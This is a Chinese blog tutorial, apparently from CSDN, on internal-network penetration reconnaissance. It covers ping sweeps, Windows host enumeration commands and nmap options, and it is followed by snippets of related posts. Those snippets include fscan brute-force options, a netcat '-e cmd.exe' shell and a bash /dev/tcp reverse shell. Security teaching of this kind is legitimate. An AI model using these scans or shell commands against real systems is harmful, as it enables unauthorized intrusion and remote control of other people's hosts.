内网渗透-信息收集

最新推荐文章于 2025-06-11 14:37:46 发布
原创 最新推荐文章于 2025-06-11 14:37:46 发布 · 4.5k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #nmap #信息安全 #网络安全

本文详细探讨了内网渗透中的信息收集过程,包括主机内部信息的全面搜集,重点介绍了Nmap的多种使用策略,以及NC、socat、fscan和masscan等工具在信息探测中的应用,旨在提升网络安全防护与渗透测试能力。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

00 信息收集的方向

    1. 主机存活探测
    2. 主机端口开放情况
    3. 主机服务探测
    4. 主机操作系统探测
    5. 网段分布情况
    6. 漏洞信息探测
    7. 主机内部信息搜集 / 域内信息搜集

01 主机内部信息收集

操作系统默认 ttl
    ① WINDOWS NT/2000 TTL:128
    ② WINDOWS 95/98      TTL:32
    ③ UNIX                          TTL:255
    ④ LINUX                        TTL:64
    ⑤ WIN7                          TTL:64
基于 icmp 协议的主机存活探测
    ① windows
for /l %i in (1,1,255) do @ ping 192.168.1.%i -w 1 -n 1 | findstr "TTL="
    ② linux
for i in {1..254};do ping -w 1 -c 1 121.5.144.$i|grep "ttl="|awk '{print $4}'|awk -F ":"
'{print $1}';done
1. 查看网络配置信息
ipconfig /all
2. 查询操作系统和版本信息
systeminfo | findstr /B /C:”OS 名称 ” /C:”OS 版本 ( 如果是英文版的中文切换成英文
3. 查看安装的软件及版本、路径等
wmic product get name,version ( 可能会很慢 )
4. 查看进程信息
1-tasklist
2-wmic process list brief
!!!:
wmic(windows management instrumentation command-line) :windows 管理工具命令行
5. 查看用户信息
net user
6. 查看本地管理员组
net localgroup administrators
7. 查询端口列表
netstat -ano
8. 查看补丁列表
1-systeminfo | findstr “KB”
2-wmic qfe get Caption,HotFixID,Description,InstalledOn
9. 查询共享列表
1-netshare
2-wmic share get name,path,status
10. 查看当前用户
whoami

02 Nmap的使用

常见端口漏洞

nmap 是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。
确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦
fingerprinting )。它是网络管理员必用的软件之一,以及用以评估网络系统
安全。
优点 :高效、开源、功能齐全
Banner :指软件开发商、软件名称、版本、服务类型等信息。
功能
§ 1- 存活主机
§ 2- 端口扫描
§ 3- 防火墙侦测
§ 4- 漏洞扫描
§ 5- 操作系统

 

用法:nmap [扫描类型] [选项] {目标规范}
例如:nmap -sSV -F -T4 192.168.37.0/24
常用命令:
-Pn:将所有主机视为联机-跳过主机发现
-v|-vv:详细|更详细过程
-sS:SYN扫描(隐匿)
-sV:探测打开的端口以确定服务/版本信息
-O:启用操作系统检测
-T <0-5>:设置时序模板(越高越快)T4
-A:综合扫描
-p:端口范围 可以-p-(代表全端口)|-p 0-65535 |-p 80,445,3389
最低0.47元/天 解锁文章

200万优质内容无限畅学
cosmos_web
关注
内网渗透-内网信息收集
lza20001103的博客
09-21 9786
内网信息收集 文章目录内网信息收集前言msf模块中的信息收集msf反弹shell后的信息收集内网信息收集后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。 msf模块中的信息收集 Msf模块 run post/ run post/windo
Windows10环境下安装FSCAN
a56484的博客
10-10 1万+
保姆级教学如何windows下安装并使用fscan内网扫描神器。
内网渗透信息搜集
LuckySec
04-12 4242
渗透测试进入内网后,面对复杂的内网域环境,首先需要了解当前所处的网络环境,例如判断当前机器的的角色,当前机器所处位置区域,以及当前网络环境的拓扑结构等。因此,我们需要对当前内网环境进行信息搜集。
系统渗透-lin20230502(解析+环境)
m0_46056107的博客
11-30 464
6.在渗透机中对服务器主机进行渗透,在服务器主机中找到管理员家目录下的flag文件,将文件中内容作为Flag值提交。5.在渗透机中对服务器主机进行渗透,在服务器主机中找到网站根目录下的flag文件,将文件中内容作为Flag值提交;2.在渗透机中对服务器主机进行渗透,在服务器主机中获取服务器主机名称,将主机名作为Flag值提交;4.在渗透机中对服务器主机进行渗透,在服务器主机中获取管理员的密码,将密码作为Flag值提交;1.在渗透机中对服务器主机进行信息收集,将服务器开启的端口号作为Flag值提交;
Mac版本Fscan下载和使用教程
最新发布
人若无名,便可专心练剑
06-11 1188
/fscan -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)./fscan -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过 web poc 扫描)./fscan -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)./fscan -h 192.168.1.1/24 -m ms17010 (指定模块)
Linux中echo命令扩展
weixin_43011785的博客
03-15 1266
1.将进程号打印到文件里。 echo $! > test.pid eg: nohup ****.jar 1>1.log 2>2.log & echo $! > test.pid 2.echo命令测试网络 eg: echo > /dev/tcp/ip/port && echo “success” Linux中的一个特殊文件: /dev/tcp 打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于.
2022 弱口令安全实验室招新赛-靶机挑战记录
qq_42077227的博客
11-16 3055
2022 弱口令安全实验室招新赛-靶机挑战记录
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 6393
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-优快云博客_反弹shell能干嘛 ...
Linux内网渗透-信息收集命令基础篇
qq_51845659的博客
03-27 1730
针对linux系统的信息收集命令超全合集,命令执行结果附图!!!
ISC-内网渗透 -最终版.pdf
04-08
- **信息收集**:搜集目标网络的相关信息- **内网拓展**:利用已获得的信息进一步探索目标网络。 - **权限提升**:提高攻击者在网络中的权限级别。 - **权限维持**:确保长期存在于目标网络中。 - **信息探测**:...
Netcat的使用方法及端口扫描
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
09-11 3738
一、基础使用方法: 1、创建一个服务器端方法:-nc -l -p [localport] 例:nc64.exe -l -p 4444(端口号) 2、创建一个客户端方法(连接服务端):-nc [remote_addr] [remoteport] 例:nc 192.168.43.106 4444 二、返回shell的使用 1、创建一个服务器端方法:-nc -l -p [localport] -e cmd.exe 例:nc64.exe -l -p 4444(端口号) 2、创建一个客户端方法(连接服务端):-nc
关于linux检测服务端口连通性四种方法
weixin_40012925的博客
03-17 1万+
linux测试网络服务四种方法
fscan使用方法:一键自动化、全方位漏洞扫描的开源工具
weixin_50464560的博客
05-21 1万+
简介 fscan 是一个内网综合扫描工具,方便一键自动化、全方位漏洞扫描。 它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 源码链接:https://github.com/shadow1ng/fscan 主要功能 1.信息搜集: 存活探测(icmp) 端口扫描 2.爆破功能: 各类服务爆破(ssh、smb等) 数据
内网漏扫工具fscan
耕耘
07-27 4356
fscan是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
fscan
热门推荐
渗透之路,攻防之间皆学问
11-10 2万+
fscan是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 下载地址:GitHub - shadow1ng/fscan 存活主机端口服务信息扫描 如下,默认会扫描存活主机、端口、漏洞等一些信息 fscan.exe -h ip或者网段 服务爆破
nc反弹bash中 &>、0>&1是什么意思
smile_3779的博客
05-23 938
本文结合一些参考文章以及作者个人理解解释Linux的bash反弹命令中的 &>、0>&1若观点有误,欢迎指出!目标讨论命令:bash -i >& /dev/tcp/ip/port 0>&1。
推荐三款内网渗透神器!
jklove9的博客
03-02 5017
推荐三款内网渗透神器---fscan kscan RequestTemplate
linux利用java反弹shell_Java Runtime.exe() 执行命令与反弹shell(上)
weixin_34710938的博客
02-26 657
0x00 前言在自己学习复现 Nexus Repository Manager 3 RCE 漏洞的时候(CVE-2020-10199/10204)由于自己对 Java 的 Runtime.exec() 执行命令以及反弹shell理解的太过于浅薄,使用了以下语句无法反弹shell,踩了很多坑$\\A{''.getClass().forName('java.lang.Runtime').getMeth...
内网渗透实战:信息收集与常用工具解析
内网渗透流程与思路和工具讲解是一门深入研究的信息安全技术,它关注的是如何通过合法或非法手段评估内部网络的安全状况,以发现潜在漏洞。以下是关于内网渗透的核心知识点: 1. **内网渗透流程**: - **阶段一:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值